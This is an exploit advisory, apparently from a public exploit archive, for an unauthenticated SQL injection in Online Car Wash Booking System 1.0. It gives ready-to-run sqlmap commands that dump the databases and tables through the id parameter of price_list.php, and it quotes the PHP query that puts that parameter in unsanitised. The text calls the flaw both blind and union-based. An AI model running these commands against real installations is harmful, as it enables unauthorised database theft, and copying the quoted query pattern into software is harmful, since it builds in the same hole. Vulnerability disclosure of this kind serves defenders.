Authored by segf0lt

Online Car Wash Booking System version 1.0 suffers from a remote blind SQL injection vulnerability.

# Exploit Title: Online Car Wash Booking System 1.0 - Unauthenticated blind SQL Injection
# Exploit Author: segf0lt
# Date: April 14, 2022
# Vendor Homepage:
# Software Link:
# Tested on: Ubuntu, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Online Car Wash Booking System 1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a union based SQL Injection attack.

# Exploit
* Exploit with Sqlmap

sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --dbms=mysql -dbs

sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --tables -D ocwbs_db

# Vulnerable Code

* No filter `id` when inserting data to database of price_list.php webpage

$price_list = $conn->query("SELECT * FROM `price_list` where service_id = '{$id}'");
$price_arr = array_column($price_list->fetch_all(MYSQLI_ASSOC),'price', 'vehicle_id');